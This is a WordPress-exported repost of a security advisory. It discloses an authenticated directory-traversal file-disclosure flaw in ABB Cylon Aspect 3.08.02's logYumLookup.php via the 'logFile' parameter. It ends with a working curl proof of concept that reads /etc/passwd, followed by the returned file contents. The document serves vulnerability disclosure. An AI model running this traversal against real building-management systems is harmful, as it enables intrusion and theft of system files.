{"id":59945,"date":"2024-10-27T02:30:12","date_gmt":"2024-10-26T23:30:12","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/182338\/ZSL-2024-5849.txt"},"modified":"2024-10-27T02:30:12","modified_gmt":"2024-10-26T23:30:12","slug":"abb-cylon-aspect-3-08-02-logyumlookup-php-authenticated-file-disclosure","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/abb-cylon-aspect-3-08-02-logyumlookup-php-authenticated-file-disclosure\/","title":{"rendered":"ABB Cylon Aspect 3.08.02 logYumLookup.php Authenticated File Disclosure"},"content":{"rendered":"<p>ABB Cylon Aspect 3.08.02 (logYumLookup.php) Authenticated File Disclosure<\/p>\n<p>Vendor: ABB Ltd.<br \/>Product web page: https:\/\/www.global.abb<br \/>Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio<br \/>Firmware: 3.08.02<\/p>\n<p>Summary: ASPECT is an award-winning scalable building energy management<br \/>and control solution designed to allow users seamless access to their<br \/>building data through standard building protocols including smart devices.<\/p>\n<p>Desc: The building management system suffers from an authenticated arbitrary<br \/>file disclosure vulnerability. Input passed through the &#8216;logFile&#8217; GET parameter<br \/>via the &#8216;logYumLookup.php&#8217; script is not properly verified before being used<br \/>to download log files. This can be exploited to disclose the contents of arbitrary<br \/>and sensitive files via directory traversal attacks.<\/p>\n<p>Tested on: GNU\/Linux 3.15.10 (armv7l)<br \/>GNU\/Linux 3.10.0 (x86_64)<br \/>GNU\/Linux 2.6.32 (x86_64)<br \/>Intel(R) Atom(TM) Processor E3930 @ 1.30GHz<br \/>Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz<br \/>PHP\/7.3.11<br \/>PHP\/5.6.30<br \/>PHP\/5.4.16<br \/>PHP\/4.4.8<br \/>PHP\/5.3.3<br \/>AspectFT Automation Application Server<br \/>lighttpd\/1.4.32<br \/>lighttpd\/1.4.18<br \/>Apache\/2.2.15 (CentOS)<br \/>OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)<br \/>OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)<\/p>\n<p>Vulnerability discovered by Gjoko &#8216;LiquidWorm&#8217; Krstic<br \/>@zeroscience<\/p>\n<p>Advisory ID: ZSL-2024-5849<br \/>Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2024-5849.php<\/p>\n<p>21.04.2024<\/p>\n<p>&#8212;<\/p>\n<p>$ cat project<\/p>\n<p>P R O J E C T<\/p>\n<p>.|<br \/>| |<br \/>|&#8217;| ._____<br \/>___ | | |. |&#8217; .&#8212;&#8220;|<br \/>_ .-&#8216; &#8216;-. | | .&#8211;&#8216;| || | _| |<br \/>.-&#8216;| _.| | || &#8216;-__ | | | || |<br \/>|&#8217; | |. | || | | | | || |<br \/>____| &#8216;-&#8216; &#8216; &#8220;&#8221; &#8216;-&#8216; &#8216;-.&#8217; &#8216;` |____<br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 <br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591<br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591 <br \/>\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2592\u2593\u2588\u2588\u2588\u2593\u2592\u2591<br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591<br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591<br \/>\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 <\/p>\n<p>$ curl &#8220;http:\/\/192.168.73.31\/logYumLookup.php?logFile=\/etc\/passwd&#8221; -H &#8220;Cookie: PHPSESSID=xxx&#8221;<br \/>&lt;p&gt;&lt;\/p&gt;&lt;p&gt;aamtech:x:500:500::\/home\/aamtech:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;mysql:x:993:65534::\/var\/mysql:<br \/>&lt;\/p&gt;&lt;p&gt;ppp:x:994:65534::\/dev\/null:\/usr\/sbin\/ppp-dialin<br \/>&lt;\/p&gt;&lt;p&gt;xuser:x:1000:1000::\/home\/xuser:<br \/>&lt;\/p&gt;&lt;p&gt;sshd:x:995:992::\/var\/run\/sshd:\/bin\/false<br \/>&lt;\/p&gt;&lt;p&gt;avahi-autoipd:x:996:993:Avahi autoip daemon:\/var\/run\/avahi-autoipd:\/bin\/false<br \/>&lt;\/p&gt;&lt;p&gt;avahi:x:997:994::\/var\/run\/avahi-daemon:\/bin\/false<br \/>&lt;\/p&gt;&lt;p&gt;systemd-journal-gateway:x:998:995::\/home\/systemd-journal-gateway:<br \/>&lt;\/p&gt;&lt;p&gt;messagebus:x:999:998::\/var\/lib\/dbus:\/bin\/false<br \/>&lt;\/p&gt;&lt;p&gt;nobody:x:65534:65534:nobody:\/nonexistent:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;irc:x:39:39:ircd:\/var\/run\/ircd:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;list:x:38:38:Mailing List Manager:\/var\/list:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;backup:x:34:34:backup:\/var\/backups:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;www-data:x:33:33:www-data:\/var\/www:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;proxy:x:13:13:proxy:\/bin:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;uucp:x:10:10:uucp:\/var\/spool\/uucp:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;news:x:9:9:news:\/var\/spool\/news:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;mail:x:8:8:mail:\/var\/mail:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;lp:x:7:7:lp:\/var\/spool\/lpd:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;man:x:6:12:man:\/var\/cache\/man:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;games:x:5:60:games:\/usr\/games:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;sync:x:4:65534:sync:\/bin:\/bin\/sync<br \/>&lt;\/p&gt;&lt;p&gt;sys:x:3:3:sys:\/dev:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;bin:x:2:2:bin:\/bin:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;daemon:x:1:1:daemon:\/usr\/sbin:\/bin\/sh<br \/>&lt;\/p&gt;&lt;p&gt;root:x:0:0:root:\/home\/root:\/bin\/sh<br \/>&lt;\/p&gt;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>ABB Cylon Aspect 3.08.02 (logYumLookup.php) Authenticated File Disclosure Vendor: ABB Ltd.Product web page: https:\/\/www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-StudioFirmware: 3.08.02 Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices. Desc: The building management system suffers &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59945","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59945","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59945"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59945\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59945"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59945"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59945"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}